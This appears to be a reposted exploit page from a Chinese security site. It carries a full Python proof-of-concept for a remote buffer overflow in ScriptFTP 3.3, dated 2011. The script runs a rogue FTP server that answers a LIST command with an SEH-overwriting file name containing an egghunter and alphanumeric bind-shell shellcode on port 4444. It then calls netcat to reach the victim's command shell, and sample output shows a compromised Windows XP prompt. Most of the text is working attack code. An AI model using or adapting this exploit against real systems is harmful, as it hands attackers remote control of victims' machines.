首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)
来源:modpr0be[at]digital-echidna[dot]org 作者:modpr0be 发布时间:2011-09-21  

# Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST)
# Date: September 20, 2011
# Author: modpr0be
# Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe
# Version: 3.3
# Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536)
# CVE : -
#
# Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner
#
# You should create your own script to work with ScriptFTP
# for example; enable passive and get the remote directory
# on your evil ftp server.
#
# my example script:
# OPENHOST("8.8.8.8","ftp","ftp")
# SETPASSIVE(ENABLED)
# GETLIST($list,REMOTE_FILES)
# CLOSEHOST
# save it to a file with .ftp extension (eg: exploit.ftp)

# root@bt :/# python scriptftp-bof-poc.py
# [*] ScriptFTP 3.3 Remote Buffer Overflow POC
# [*] by modpr0be[at]digital-echidna[dot]org.
# [*] thanks a lot to cyb3r.anbu | otoy :)
# =============================================
# [*] Evil FTP Server Ready
# [*] Server initiated.
# [*] Awaiting connection...
# [*] Connection created by 172.16.87.129.
# [*] Establishing session.
# [*] Pwning in progress..
# [*] This may take up 50 seconds or less.
# [!] Hunter is hunting the Egg ;)
# [!] Waiting for a shell..
# [!] 0wn3d..!
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\ScriptFTP>
#
# Yes, this poc is using PASSIVE connection and it will
# take some time to establish. I love the way we wait for a shell ;)

#!/usr/bin/python

import socket
import os
import sys
import time

class ftp_server:
    def __init__(self):
        self.host = '0.0.0.0'
        self.passive_port = 7214
        self.log("""
[*] ScriptFTP <=3.3 Remote Buffer Overflow POC
[*] by modpr0be[at]digital-echidna[dot]org
[*] thanks a lot to cyb3r.anbu | otoy :)
=============================================
[*] Evil FTP Server Ready""")

        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(('', 21))
        self.sock.listen(1)

        a = self.passive_port/256
        b = self.passive_port%256
        self.tuple_port = (a, b)
        self.host_join = ','.join(self.host.split('.'))
        self.passive = False

        self.log("[*] Server initiated.")

    def log(self, msg):
        print msg

    def get(self):
        return self.conn.recv(1024).replace('\r', '').replace('\n', '')

    def getcwd(self):
        return os.getcwd().split(chr(92))[-1]
   
    def put(self, ftr):
        x = {

            150:" Data connection accepted from %s:%s; transfer starting.\r\n226 Listing completed."%(self.host, self.passive_port),
            200:" Type okay.",
            220:" %s Server is ready."%self.host,
            226:" Listing completed.",
            227:" Entering Passive Mode (%s,%s,%s)"%(self.host_join, self.tuple_port[0], self.tuple_port[1]),
            230:" User logged in, proceed.",
            250:' "/%s" is new cwd.'%self.getcwd(),
            257:' "/%s" is cwd.'%self.getcwd(),
            331:" User name okay, need password.",
            502:" Command not implemented.",
            551:" Requested action aborted. Page type unknown."     

                   }[ftr]

        s = '%s%s\r\n'%(ftr, x)
        self.conn.send(s)
        return s

    def main(self):
        self.log("[*] Awaiting connection...")
        self.conn, addr = self.sock.accept ()
        self.log("[*] Connection created by %s.\n[*] Establishing session."%addr[0])
 self.put(220)
        self.log("[*] Pwning in progress..")
 self.log("[*] This may take up 50 seconds or less.")

        while 1:
            try:
                data = self.get().upper()
            except socket.error:
                self.conn.close()
                self.sock.shutdown(socket.SHUT_RDWR)
                raise socket.error
    
            if data[:4] == 'USER':   s = 331
            elif data[:4] == 'PASS': s = 230
            elif data[:3] == 'PWD':  s = 257
            elif data[:4] == 'TYPE': s = 200
            elif data[:4] == 'PASV':
                # create passive port
                self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.sock2.bind(('', self.passive_port ))
                self.sock2.listen(1)
                s = self.put(227)
                self.conn2, addr = self.sock2.accept()
                self.passive = True
                s = 0 # don't routine
     
            elif data[:3] == 'CWD':
                try:
                    os.chdir('..%s'%data.split(' ')[-1])
                    s = 250
                except OSError:
                    s = 551
     
            elif data[:4] == 'LIST':
                s = self.put(150)
                s = self.passive_do(1)
                s = 0 # don't routine
  print "[!] Hunter is hunting the Egg ;)"
  time.sleep(50)
  print "[!] Waiting for a shell.."
  time.sleep(2)
  print "[!] 0wn3d..!\n"
  os.system("nc %s 4444"%addr[0])
  sys.exit()
            else:
  s = 502

            if s:
                s = self.put(s)

    def passive_do(self, id):
        if id == 1:
     #bind to port 4444
     bind = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ"
                    "APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"
                    "IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI"
                    "XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO"
                    "8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J"
                    "P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1"
                    "8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL"
                    "MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4"
                    "KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2"
                    "1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3"
                    "80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX"
                    "U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM"
                    "2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP"
                    "8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK"
                    "OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO"
                    "TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P"
                    "SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9"
                    "E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW"
                    "KQ7MCT2BO2JKPQCKOZ5A")
    
     # 32bit egghunter from corelanc0d3r, thx ;)
     egghunter = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
    "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
    "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
    "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
    "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
    "SEYWKOYWA")
      
     junk = "A" * 1746  #junk
     nseh = "\x61\x62"  #nseh
            seh = "\x45\x5B"   #seh ppr somewhere on scriptftp dir
           
     #prepare for align
            align = "\x60"   #pushad
     align += "\x73"   #nop/align
     align += "\x53"   #push ebx
     align += "\x73"   #nop/align
            align += "\x58"   #pop eax
     align += "\x73"   #nop/align
     align += "\x05\x02\x11"      #add eax,0x11000200
     align += "\x73"              #nop/align
            align += "\x2d\x01\x11"      #sub eax,0x11000120
     align += "\x73"              #nop/align
    
     #walking
        walk = "\x50"   #push eax
     walk += "\x73"   #nop/align
     walk += "\xc3"   #ret
   
     #align again
     align2 = "0t0t" + "\x73\x57\x73\x58\x73"  #nop/push edi/nop/pop eax/nop
     align2 += "\xb9\x1b\xaa"   #mov ecx,0xaa001b00
     align2 += "\xe8\x73"   #add al,ch + nop
     align2 += "\x50\x73\xc3"   #push eax,nop,ret

     sampah1 = "\x44" * 106 + "\x73"  #eax+106/align nop
     sampah2 = "\x42" * 544   #right after shellcode
    
     crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1

            res = """-rwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 """+crash+""".txt\r\ndrwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 A\r\nrwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 """+ crash +".txt\r\n"

        self.conn2.send(res)
        # self.conn2.send('\r\n') # send blank
 return res

try:
 ftp_server().main()
except socket.error:
        print "[!] Socket is not ready, shutting down...\n"

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·KnFTP 1.0.0 Server - Remote Bu
·AVCon DEP Bypass
·DaqFactory HMI NETB Request Ov
·MKV TO AVI Converter Local Buf
·AMADIS Video Converter SEH Buf
·Cool Music Editor Local Stack
·3GP Video Converter Local Buff
·ScriptFTP <=3.3 Remote Buffer
·Rever Audio Converter(avi To w
·eSignal and eSignal Pro <= 10.
·ALL IN 1 MOBILE VIDEO Denial o
·Blue Coat Reporter Unauthentic
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved